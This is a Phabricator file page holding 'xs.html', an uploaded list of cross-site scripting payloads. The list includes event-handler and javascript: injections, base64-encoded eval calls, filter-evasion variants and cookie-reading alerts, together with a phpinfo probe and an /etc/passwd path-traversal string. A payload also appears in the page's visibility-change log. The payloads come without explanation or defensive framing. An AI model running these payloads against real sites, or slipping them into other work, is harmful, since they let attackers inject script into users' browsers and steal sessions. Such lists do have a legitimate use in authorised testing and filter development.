Page MenuHomePhabricator
Files F275763

xs.html
Public
Actions

Authored By
balamir97
Jan 25 2015, 11:50 PM
Size
3 KB
Referenced Files
None
Subscribers
None
Tokens
"Love" token, awarded by balamir97.

xs.html
View Options

<img src=a id=/confirm(1)/ onerror=eval(id);>
<iframe src="https://www.google.com">
"><a/href="javascript:alert(1)">
"><abbr//onmouseup='eval(atob("cHJvbXB0KDEpOw=="))'>1
<div style='widht:expression(confirm(1))'>
<di/*DiV*/v/cl/*CLASS*/ass=""onmouseover='eval(atob("cHJvbXB0KDEpOw=="))'>xss
"><script>alert(1);</script>
<a/href=ja&Tab;vasc&NewLine;ript&colon;confirm(1)>clckicl</a>
<a onmouseover= 'eval(atob("cHJvbXB0KDEpOw=="))' >
"--></STYLE>"><SCRIPT>;confirm(/XSS/);//></SCRIPT>
" onmouseout=" confirm(1)()
"onmouseover= 'eval(atob("cHJvbXB0KDEpOw=="))'
"/*//;*/></STYle/**/>/*//;*/<sCRiPt>/*//;*/alert(1);/*//;*/</SCRipt/*//;*//
<img src=search"/onerror=alert("Xss")//">
<u/oncut=alert(1)
"onclick='eval(atob("cHJvbXB0KDEpOw=="))'>
width:expression&#x28;alert&#x28;1&#x29;&#x29;
<math><a/xlink:href=javascript&colon;confirm(1)>click</a>
<A href =javascript&colon;confirm(1);>click</A>
"><svg/onload=;confirm(0)//
<i onmouseover=alert(1)>
" onfocus=confirm(1) autofocus b="
<base href="javascript:\"> <a href="//%0aalert(/@irsdl/);//">works in Chrome</a>
\03Cscript>alert(1);\03Ccscript>
<a onmouseleave=javascript&colon;confirm(1)>
<img src=x:data:window.confirm(alt) onerror=eval(src) alt=39>
<math href="javascript:confirm(1)">CLICKME</math>
"><image/onerror=/confirm(0)/src=0/>
'"><iframe src="javascript:prompt(0)">
'"><iframe data-mce-src="1" src="javascript:prompt(38)">
<isindex action=javascript:confirm(1) type=image>
<style></script><script>[{'a':Object.prototype.__defineSetter__('b',function(){data:window.confirm(arguments[0])}),'b':['secret']}]</script>
<input type=text value=a onfocus=confirm(37) autofocus
"><image onerror=confirm(0) src=0>
"><object data="javascript:alert(36)">
<?php phpinfo() ?>
../../../../etc/passwd
Burdamın :)
<a onclick="javascript:alert(1)">x
"><scrIPT>prompt(1);</SCRript>
"};alert(1);a={"a":
&raquo;
"><img src=x onerror=prompt(35);>
'><input/**/onfocus//;=confirm(1)>
"--></style>"><script>;alert(1);//></script>
" onmouseout=";confirm(/XSS/);
<video><source onerror="confirm(document.domain)">
'"><MARQUEE ONSTART=confirm(/XSS/)//
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver
'"/></a></><img src=1.gif onerror=alert(1)>
&quot; onmouseout=&quot; confirm(1)
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<svg/onload='eval(atob("cHJvbXB0KDEpOw=="))'
<input type="text" name="something" value="" onfocus=alert(1) autofocus b=">
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
"><abbr//////onmouseup="javascript:alert(1)">1
<select name="a" onblur="alert(1)">
'"--></style></scRipt><scRipt>data:window.confirm('Enderun07')</scRipt>
<input type=text value=a onfocus=confirm(34) autofocus>
toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'"+alert(/xss/)+"--></style><img src=x onerror=alert(/xss/)>*/}
//;/<INPUT//;/TYPE="TEXT"//;/AUTOFOCUS//;/ONFOCUS=confirm(33)>
//;/<INPUT//;/TYPE="%00TEXT%00"//;/AUTOFOCUS%00//;/ONFOCUS=confirm(31)>
'><input type=text oninput=\u0061lert(1)>
'><h1/onmouseleave='\u0061lert(1)'>
"onclick=alert(1);>
input=";//';//</script>'<input type=image src=x onerror=
alert(32);
//'
" onmouseover="confirm(1);
//;/<INPUT//;/TYPE="%00TEXT%00"//;/AUTOFOCUS%00//;/ONFOCUS=confirm(31)>
<script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>
"><svg/onload=alert(document.cookie)//
<a href=javascript&colon;prompt&lpar;document&period;cookie&rpar;>Click Here To Review XSS </a>
<mAth><A/Xlink:HREF=JaVaScRiPt&colon;confirm(1)>XSS</A>
'><img src=a %69%64=//confirm(confirm(confirm(1)))/ ONeRRor=eval(%69%64);>

File Metadata

Mime Type
text/html
Storage Engine
amazon-s3
Storage Format
Raw Data
Storage Handle
phabricator/xd/3f/rdo7ciodueelg7tb
Default Alt Text
xs.html (3 KB)

Event Timeline

balamir97 awarded a token.Jan 25 2015, 11:51 PM
balamir97 changed the visibility from "balamir97 ("onmouseover="confirm(1);)" to "Public (No Login Required)".
Phabricator · Built by Phacility